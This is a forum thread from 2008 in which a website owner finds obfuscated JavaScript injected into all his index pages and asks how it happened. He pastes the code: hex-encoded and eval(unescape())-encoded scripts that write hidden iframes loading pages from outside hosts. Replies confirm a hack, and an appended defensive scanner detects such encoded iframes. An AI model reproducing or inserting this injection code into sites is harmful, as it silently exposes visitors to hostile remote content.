Odd Javascript/Index Problem

Discussion in 'The Living Room' started by Kæton, Jun 3, 2008.

  1. #1
    Kæton

    Kæton is Keaton LPA Über VIP

    Joined:
    Oct 16, 2002
    Messages:
    10,388
    Likes Received:
    9



    I noticed my site was doing a lot of javascript loading for some odd reason and after looking at the source code, it seems the index pages for all directories in my domain had been updated with this javascript crap inside it. I'm curious to know how this happened and how I may prevent it from happening again.

    It seems to have something to do with traffic. I think some ass clown out there thought they'd get a lot of hits by somehow redirecting crap from my pages thinking I wouldn't catch on.

    Here's a rundown of some shady business I've seen lately:
    - A lot of sites with no relation to content on my site are somehow linking to me (according to stats).

    - The javascript continuously refreshing or something to multiple different URLs though the page remains the same.

    - According to my FTP, every index page (php/html extension) was updated on May 17th, presumably with this code inserted.

    I'm going to contact my host to see if there was any activity on that date that could help me understand the situation but I doubt it'll be very helpful. I'd like to know if there's some technique out there doing this that I can look out for or if I really was hacked.

    I've already changed my passwords and manually uploaded the original files for the most "popular" directory indexes on my site but I'd like to know if there's anything else I can do to prevent this because it's a pain in the ass to resolve.


    Thanks. :)


    edit: This is the code being inserted into the pages. It only seems to work on .html extensions because my index.php pages don't seem to react to the script.

    Code:
    function v482f6fc75b53f(v482f6fc75b925){  return(parseInt(v482f6fc75b925,16));}function v482f6fc75c4dd(v482f6fc75c8c6){  var v482f6fc75ccad='';for(v482f6fc75d095=0; v482f6fc75d095<v482f6fc75c8c6.length; v482f6fc75d095+=2){ v482f6fc75ccad+=(String.fromCharCode(v482f6fc75b53f(v482f6fc75c8c6.substr(v482f6fc75d095, 2))));}return v482f6fc75ccad;} document.write(v482f6fc75c4dd('3C696672616D65206E616D653D273035303027207372633D27687474703A2F2F626573746D6173746572732E636E2F7570646174652E706870272077696474683D343137206865696768743D343736207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
     
    !--
    var d=document;
    eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%65%64%2d%63%61%76%69%61%72%2d%6b%61%6d%63%68%61%74%6b%61%2e%63%6f%6d%2f%73%70%6c%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%37%36%33%38%29%2b%27%63%34%5c%27%20%77%69%64%74%68%3d%35%39%38%20%68%65%69%67%68%74%3d%34%38%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c3883382584;
    //--
    edit 2:
    I decrypted the second part of the code and it's definitely a script loading an iframe and hiding itself using a display command.
     
  2. #2
    Tomi

    Tomi LPA Addict

    Joined:
    Mar 10, 2004
    Messages:
    16,514
    Likes Received:
    51



    Ah, I've seen that before. You've indeed been hacked. Change your passwords, and look for anything exploitable.
     
  3. #3
    Kæton


    I was afraid of that but at the same time I find this to be absolutely hilarious. That means someone actually thought it'd be a good idea to hack my site (of all sites?), grab those files, take the time to edit them all and re-upload them. Now all I had to do is replace them with the originals and it's back to normal. That really doesn't make any sense and boy makes me feel bad for that poor sap... The guy huddled over his computer with some Red Bull and Cheetos all night... :lol:

    Anyways, thanks for the help Tomi. Are there any exploits that these “hackers” use that are often overlooked by the common folk that I could look into securing? :D The only thing I really use nowadays is Wordpress.
     
  4. #4
    Tomi


    I doubt anyone personally did it. Probably a script or something that did it.

    Wordpress may have had an exploit. Make sure you're up to date. I know when I last saw this, it was on an IPB board. Something was exploited, which gave access to the admin cp and then that code was inserted into the wrapper.

    I find the whole escaped code idea amusing, as most people wouldn't have ever thought of checking for that, just code for an iframe. *chuckle*
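
The check discussed in the last post (looking for escaped code, not only a literal iframe tag), as an added example that is not part of the original thread. It decodes hex-pair and %XX string literals as plain text and reports any that contain an iframe; the function names, the length thresholds and the `example.invalid` sample page are assumptions made for illustration.

```javascript
// Static check for encoded iframe injections: page content is handled purely
// as text, nothing from the scanned file is evaluated.
const LITERAL = /(['"])([^'"\r\n]{40,})\1/g; // quoted runs of 40+ chars (assumed threshold)
const PCT = /%([0-9a-f]{2})/gi;
const fromHex = (h) => String.fromCharCode(parseInt(h, 16));

// Return the decoded text if the literal looks hex- or %-encoded, else null.
function decodeLiteral(text) {
  if (/^(?:[0-9a-f]{2})+$/i.test(text)) {
    return { encoding: 'hex', decoded: text.replace(/[0-9a-f]{2}/gi, fromHex) };
  }
  if ((text.match(PCT) || []).length >= 10) {
    // Decoded by hand: decodeURIComponent throws on malformed sequences.
    return { encoding: 'percent', decoded: text.replace(PCT, (_, h) => fromHex(h)) };
  }
  return null;
}

// Report every encoded literal in `source` that decodes to an <iframe> tag.
function scanForEncodedIframes(source) {
  const findings = [];
  for (const m of source.matchAll(LITERAL)) {
    const result = decodeLiteral(m[2]);
    if (!result) continue;
    const tag = result.decoded.match(/<iframe\b[^>]*>/i);
    if (!tag) continue;
    const src = tag[0].match(/\bsrc\s*=\s*\\?['"]?([^'"\\\s>]+)/i);
    findings.push({
      line: source.slice(0, m.index).split('\n').length,
      encoding: result.encoding,
      src: src ? src[1] : null,
      hidden: /display\s*:\s*none/i.test(tag[0]),
    });
  }
  return findings;
}

// Constructed sample page (benign; example.invalid is a placeholder host).
const benignTag = "<iframe src='http://example.invalid/a.php' width=1 height=1 style='display:none'></iframe>";
const toHex = (s) => Array.from(s, (c) => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const toPct = (s) => toHex(s).replace(/../g, '%$&');
const SAMPLE_PAGE = [
  '<html><body><p>Welcome to my site, thanks for stopping by today!</p>',
  "<script>document.write(dec('" + toHex(benignTag) + "'));</script>",
  '<script>eval(unescape("' + toPct(benignTag) + '"));</script>',
  '</body></html>',
].join('\n');

console.log(scanForEncodedIframes(SAMPLE_PAGE));
```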
     
